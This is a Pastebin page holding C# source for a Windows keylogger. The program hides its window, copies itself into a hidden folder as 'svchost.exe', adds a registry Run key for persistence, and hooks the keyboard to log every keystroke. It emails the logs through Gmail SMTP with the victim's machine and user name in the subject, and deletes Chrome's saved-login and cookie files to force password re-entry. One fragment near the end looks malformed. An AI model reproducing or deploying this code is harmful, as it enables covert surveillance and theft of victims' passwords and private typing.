Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- using System;
- using System.Runtime.InteropServices;
- using System.Windows.Forms;
- using System.Diagnostics;
- using Microsoft.Win32;
- using System.Threading;
- using System.Net;
- using System.Net.Mail;
- using System.Threading.Tasks;
- using System.IO;
- using System.Text;
- namespace Keylogger
- {
- class Program
- {
- #region Keycode
- private const int WH_KEYBOARD_LL = 13;
- private const int WM_KEYDOWN = 0x0100;
- private const byte VK_RETURN = 0X0D;
- private const byte VK_SPACE = 0X20;
- private const byte VK_SHIFT = 0x10;
- private const byte VK_CAPITAL = 0x14;
- #endregion
- private static LowLevelKeyboardProc _proc = HookCallback;
- private static IntPtr _hookID = IntPtr.Zero;
- private static string filename =
- Environment.GetFolderPath(Environment.SpecialFolder.MyDocuments) + "\\Logs\\" +
- DateTime.Now.DayOfYear.ToString().PadLeft(3, '0') +
- DateTime.Now.Hour.ToString().PadLeft(2, '0') +
- DateTime.Now.Minute.ToString().PadLeft(2, '0') + ".log";
- private static string me = System.Reflection.Assembly.GetEntryAssembly().Location;
- private static string documentsfolder = Environment.GetFolderPath(Environment.SpecialFolder.MyDocuments);
- static void Main(string[] args)
- {
- ShowWindow(Process.GetCurrentProcess().MainWindowHandle, 0);
- StartUpCheck();
- new Task(MailLoopTry).Start();
- _hookID = SetHook(_proc);
- Application.Run();
- UnhookWindowsHookEx(_hookID);
- }
- private static void MailLoopTry()
- {
- bool x = false;
- while (!x)
- {
- if (Mail())
- {
- x = true;
- foreach (string file in Directory.GetFiles(documentsfolder + "\\Logs\\"))
- {
- FileInfo fi = new FileInfo(file);
- if (fi.Extension == ".log")
- {
- try{ File.Delete(file); } catch (Exception) { }
- }
- }
- }
- Thread.Sleep(15000);
- }
- }
- private static bool Mail()
- {
- SmtpClient client = new SmtpClient("smtp.gmail.com", 587);
- client.EnableSsl = true;
- client.DeliveryMethod = SmtpDeliveryMethod.Network;
- client.Credentials = new NetworkCredential("Sender@gmail.com", "Password");
- client.Timeout = 20000;
- //Info: Sender's Gmail's "Less Secure Apps" Settings must be turned on for this to work
- MailMessage msg = new MailMessage(new MailAddress("Sender@gmail.com"), new MailAddress("Reciver@gmail.com"));
- msg.Subject = Environment.MachineName + " : " + Environment.UserName;
- msg.Body = "";
- foreach (string file in Directory.GetFiles(documentsfolder + "\\Logs\\"))
- {
- FileInfo fi = new FileInfo(file);
- if (fi.Extension == ".log" & fi.FullName != filename)
- {
- msg.Attachments.Add(new Attachment(fi.FullName));
- }
- }
- try
- {
- client.Send(msg);
- msg.Dispose();
- return true;
- }
- catch (Exception) { msg.Dispose(); return false; }
- }
- static void StartUpCheck()
- {
- if (!Directory.Exists(documentsfolder + "\\Logs\\"))
- { Directory.CreateDirectory(documentsfolder + "\\Logs\\"); }
- DirectoryInfo di = new DirectoryInfo(documentsfolder + "\\Logs\\");
- di.Attributes |= FileAttributes.Hidden;
- di.Attributes |= FileAttributes.System;
- di.Attributes |= FileAttributes.NoScrubData;
- if (new FileInfo(Application.ExecutablePath).Directory.FullName.ToString().ToLower() != documentsfolder.ToLower() + "\\Logs".ToLower())
- {
- try
- {
- File.Copy(me, documentsfolder + "\\Logs\\svchost.exe", true);
- Process.Start(documentsfolder + "\\Logs\\svchost.exe");
- }
- catch (Exception) { }
- Environment.Exit(0);
- }
- SetStartup();
- try
- {
- File.Delete(Environment.GetFolderPath(Environment.SpecialFolder.UserProfile) + @"\AppData\Local\Google\Chrome\User Data\Default\Login Data");
- File.Delete(Environment.GetFolderPath(Environment.SpecialFolder.UserProfile) + @"\AppData\Local\Google\Chrome\User Data\Default\Cookies");
- } catch (Exception) { }
- }
- private static void SetStartup()
- {
- RegistryKey rk = Registry.CurrentUser.OpenSubKey
- ("SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", true);
- rk.SetValue("svchost", Application.ExecutablePath.ToString());
- }
- private static IntPtr SetHook(LowLevelKeyboardProc proc)
- {
- using (Process curProcess = Process.GetCurrentProcess())
- using (ProcessModule curModule = curProcess.MainModule)
- {
- return SetWindowsHookEx(WH_KEYBOARD_LL, proc,
- GetModuleHandle(curModule.ModuleName), 0);
- }
- }
- private delegate IntPtr LowLevelKeyboardProc(int nCode, IntPtr wParam, IntPtr lParam);
- private static IntPtr HookCallback(int nCode, IntPtr wParam, IntPtr lParam)
- {
- if (nCode >= 0 && wParam == (IntPtr)WM_KEYDOWN)
- {
- bool isDownShift = ((GetKeyState(VK_SHIFT) & 0x80) == 0x80 ? true : false);
- bool isDownCapslock = (GetKeyState(VK_CAPITAL) != 0 ? true : false);
- int vkCode = Marshal.ReadInt32(lParam);
- StreamWriter sr = File.AppendText(filename);
- if (vkCode == (int)Keys.RShiftKey | vkCode == (int)Keys.LShiftKey | vkCode == (int)Keys.RControlKey | vkCode == (int)Keys.LControlKey |
- vkCode == (int)Keys.Right | vkCode == (int)Keys.Left | vkCode == (int)Keys.Up | vkCode == (int)Keys.Down)
- { /* I am avoiding these keys */ }
- // Cause too much repetition of these can be a headache Plus they are pointless to log
- else if (vkCode == (int)Keys.Return)
- {
- sr.Write(" ;{Enter Key} ");
- sr.WriteLine();
- }
- else if ((isDownCapslock && isDownShift) || (!(isDownCapslock) && !(isDownShift)))
- {
- if (isDownCapslock == true)
- {
- if (vkCode >= 0x41 && vkCode <= 0x5A)
- {
- try
- {
- sr.Write(Convert.ToChar(vkCode + 32));
- }
- catch (Exception) { }
- }
- else
- {
- try
- {
- #region LongSwitch
- switch (vkCode)
- {
- case ((int)'À'):
- sr.Write("~");
- break;
- case ((int)'½'):
- sr.Write("_");
- break;
- case ((int)'»'):
- sr.Write("+");
- break;
- case ((int)'Û'):
- sr.Write("{");
- break;
- case ((int)'Ý'):
- sr.Write("}");
- break;
- case ((int)'Ü'):
- sr.Write("|");
- break;
- case ((int)'º'):
- sr.Write(":");
- break;
- case ((int)'Þ'):
- sr.Write("\"");
- break;
- case ((int)'¼'):
- sr.Write("<");
- break;
- case ((int)'¾'):
- sr.Write(">");
- break;
- case ((int)'¿'):
- sr.Write("?");
- break;
- case ((int)'1'):
- sr.Write("!");
- break;
- case ((int)'2'):
- sr.Write("@");
- break;
- case ((int)'3'):
- sr.Write("#");
- break;
- case ((int)'4'):
- sr.Write("$");
- break;
- case ((int)'5'):
- sr.Write("%");
- break;
- case ((int)'6'):
- sr.Write("^");
- break;
- case ((int)'7'):
- sr.Write("&");
- break;
- case ((int)'8'):
- sr.Write("*");
- break;
- case ((int)'9'):
- sr.Write("(");
- break;
- case ((int)'0'):
- sr.Write(")");
- break;
- default:
- sr.Write(new StringBuilder(" {" + (Keys)vkCode + "} ").ToString());
- break;
- }
- #endregion
- }
- catch (Exception) { }
- }
- }
- else if (vkCode >= 0x41 && vkCode <= 0x5A)
- {
- try
- {
- sr.Write(Convert.ToChar(vkCode + 32));
- }
- catch (Exception) { }
- }
- else if (vkCode == 0X20)
- {
- sr.Write(" ");
- }
- else
- {
- try
- {
- #region LongSwitch
- switch (vkCode)
- {
- case ((int)'À'):
- sr.Write("`");
- break;
- case ((int)'½'):
- sr.Write("-");
- break;
- case ((int)'»'):
- sr.Write("=");
- break;
- case ((int)'Û'):
- sr.Write("[");
- break;
- case ((int)'Ý'):
- sr.Write("]");
- break;
- case ((int)'Ü'):
- sr.Write(@"\");
- break;
- case ((int)'º'):
- sr.Write(";");
- break;
- case ((int)'Þ'):
- sr.Write("'");
- break;
- case ((int)'¼'):
- sr.Write(",");
- break;
- case ((int)'¾'):
- sr.Write(".");
- break;
- case ((int)'¿'):
- sr.Write("/");
- break;
- case ((int)'1'):
- sr.Write("1");
- break;
- case ((int)'2'):
- sr.Write("2");
- break;
- case ((int)'3'):
- sr.Write("3");
- break;
- case ((int)'4'):
- sr.Write("4");
- break;
- case ((int)'5'):
- sr.Write("5");
- break;
- case ((int)'6'):
- sr.Write("6");
- break;
- case ((int)'7'):
- sr.Write("7");
- break;
- case ((int)'8'):
- sr.Write("8");
- break;
- case ((int)'9'):
- sr.Write("9");
- break;
- case ((int)'0'):
- sr.Write("0");
- break;
- default:
- sr.Write(new StringBuilder(" {" + (Keys)vkCode + "} ").ToString());
- break;
- }
- #endregion
- }
- catch (Exception) { }
- }
- }
- else
- {
- if (vkCode >= 0x41 && vkCode <= 0x5A)
- {
- try
- {
- sr.Write(Convert.ToChar(vkCode));
- }
- catch (Exception) { }
- }
- else if (isDownShift)
- {
- try
- {
- #region LongSwitch
- switch (vkCode)
- {
- case ((int)'À'):
- sr.Write("~");
- break;
- case ((int)'½'):
- sr.Write("_");
- break;
- case ((int)'»'):
- sr.Write("+");
- break;
- case ((int)'Û'):
- sr.Write("{");
- break;
- case ((int)'Ý'):
- sr.Write("}");
- break;
- case ((int)'Ü'):
- sr.Write("|");
- break;
- case ((int)'º'):
- sr.Write(":");
- break;
- case ((int)'Þ'):
- sr.Write("\"");
- break;
- case ((int)'¼'):
- sr.Write("<");
- break;
- case ((int)'¾'):
- sr.Write(">");
- break;
- case ((int)'¿'):
- sr.Write("?");
- break;
- case ((int)'1'):
- sr.Write("!");
- break;
- case ((int)'2'):
- sr.Write("@");
- break;
- case ((int)'3'):
- sr.Write("#");
- break;
- case ((int)'4'):
- sr.Write("$");
- break;
- case ((int)'5'):
- sr.Write("%");
- break;
- case ((int)'6'):
- sr.Write("^");
- break;
- case ((int)'7'):
- sr.Write("&");
- break;
- case ((int)'8'):
- sr.Write("*");
- break;
- case ((int)'9'):
- sr.Write("(");
- break;
- case ((int)'0'):
- sr.Write(")");
- break;
- default:
- sr.Write(new StringBuilder(" {" + (Keys)vkCode + "} ").ToString());
- break;
- }
- #endregion
- }
- catch (Exception) { }
- }
- else
- {
- try
- {
- #region LongSwitch
- switch (vkCode)
- {
- case ((int)'À'):
- sr.Write("`");
- break;
- case ((int)'½'):
- sr.Write("-");
- break;
- case ((int)'»'):
- sr.Write("=");
- break;
- case ((int)'Û'):
- sr.Write("[");
- break;
- case ((int)'Ý'):
- sr.Write("]");
- break;
- case ((int)'Ü'):
- sr.Write(@"\");
- break;
- case ((int)'º'):
- sr.Write(";");
- break;
- case ((int)'Þ'):
- sr.Write("'");
- break;
- case ((int)'¼'):
- sr.Write(",");
- break;
- case ((int)'¾'):
- sr.Write(".");
- break;
- case ((int)'¿'):
- sr.Write("/");
- break;
- case ((int)'1'):
- sr.Write("1");
- break;
- case ((int)'2'):
- sr.Write("2");
- break;
- case ((int)'3'):
- sr.Write("3");
- break;
- case ((int)'4'):
- sr.Write("4");
- break;
- case ((int)'5'):
- sr.Write("5");
- break;
- case ((int)'6'):
- sr.Write("6");
- break;
- case ((int)'7'):
- sr.Write("7");
- break;
- case ((int)'8'):
- sr.Write("8");
- break;
- case ((int)'9'):
- sr.Write("9");
- break;
- case ((int)'0'):
- sr.Write("0");
- break;
- default:
- sr.Write(new StringBuilder(" {" + (Keys)vkCode + "} ").ToString());
- break;
- }
- #endregion} catch (Exception) { }
- }
- catch (Exception) { }
- }
- }
- sr.Close();
- }
- return CallNextHookEx(_hookID, nCode, wParam, lParam);
- }
- #region DllImports
- [DllImport("user32.dll", CharSet = CharSet.Auto, SetLastError = true)]
- private static extern IntPtr SetWindowsHookEx(int idHook,
- LowLevelKeyboardProc lpfn, IntPtr hMod, uint dwThreadId);
- [DllImport("user32.dll", CharSet = CharSet.Auto, SetLastError = true)]
- [return: MarshalAs(UnmanagedType.Bool)]
- private static extern bool UnhookWindowsHookEx(IntPtr hhk);
- [DllImport("user32.dll", CharSet = CharSet.Auto, SetLastError = true)]
- private static extern IntPtr CallNextHookEx(IntPtr hhk, int nCode,
- IntPtr wParam, IntPtr lParam);
- [DllImport("kernel32.dll", CharSet = CharSet.Auto, SetLastError = true)]
- private static extern IntPtr GetModuleHandle(string lpModuleName);
- [DllImport("user32.dll")]
- public static extern IntPtr FindWindow(string lpClassName, string lpWindowName);
- [DllImport("user32.dll")]
- static extern bool ShowWindow(IntPtr hWnd, int nCmdShow);
- [DllImport("user32.dll")]
- static extern short GetKeyState(int vKey);
- #endregion
- }
- }
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
